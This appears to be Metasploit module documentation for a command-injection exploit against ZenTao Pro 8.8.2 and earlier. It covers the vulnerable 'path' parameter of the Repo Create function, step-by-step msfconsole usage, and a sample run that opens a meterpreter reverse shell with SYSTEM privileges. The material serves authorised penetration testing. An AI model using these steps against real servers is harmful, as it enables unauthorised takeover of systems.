## Vulnerable Application
This module exploits a command injection vulnerability in ZenTao Pro 8.8.2 and earlier versions in order to execute arbitrary commands with
SYSTEM privileges.
          
The module first tries to obtain the ZenTao Pro version from /pro/user-login.html. If a vulnerable version is found,
it attempts to authenticate to the ZenTao dashboard. It then tries to execute the payload by submitting fake repositories via
the 'Repo Create' function that is accessible from the dashboard via CI>Repo.
More precisely, the module sends HTTP POST requests to '/pro/repo-create.html' that inject commands in the vulnerable 'path'
parameter which corresponds to the 'Client Path' input field.

Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
running on Windows 10 (XAMPP server).

Vulnerable software for testing can be downloaded [here](https://www.zentao.pm/download.html)
and [here](https://sourceforge.net/projects/zentao/).
The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'.
The package for ZenTao 8.8.2 is available [here](https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html).
Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe`
and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available [here]
(https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html).

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/windows/http/zentao_pro_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set USERNAME [username for the ZenTao Pro account]`
6. Do: `set PASSWORD [password for the ZenTao Pro account]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the ZenTao Pro account to authenticate with. This option is required.
### TARGETPATH
The path on the target where commands will be executed. The default value is `C:\`.
### TARGETURI
The base path to ZenTao Pro. The default value is `/pro/`.
### USERNAME
The username for the ZenTao Pro account to authenticate with. This option is required.

## Targets
```
Id  Name
--  ----
0   Windows (x86)
1   Windows (x64)
```

## Scenarios
### ZenTao 8.8.2 running on Windows 10 (XAMPP server)
```
msf5 exploit(windows/http/zentao_pro_rce) > show options

Module options (exploit/windows/http/zentao_pro_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PASSWORD    zentao123        yes       Password to authenticate with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.9.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   TARGETPATH  C:\              yes       The path on the target where commands will be executed
   TARGETURI   /pro/            yes       The base path to ZenTao
   URIPATH                      no        The URI to use for this exploit (default is random)
   USERNAME    admin            yes       Username to authenticate with
   VHOST                        no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows (x64)


msf5 exploit(windows/http/zentao_pro_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] Successfully authenticated to ZenTao 8.8.2.
[*] Executing the payload...
[*] Command Stager progress -  20.97% done (2049/9770 bytes)
[*] Command Stager progress -  41.94% done (4098/9770 bytes)
[*] Command Stager progress -  62.92% done (6147/9770 bytes)
[*] Command Stager progress -  83.89% done (8196/9770 bytes)
[*] Command Stager progress - 100.15% done (9785/9770 bytes)
[*] Sending stage (201283 bytes) to 192.168.9.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.9.14:50506) at 2020-07-08 15:01:22 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```
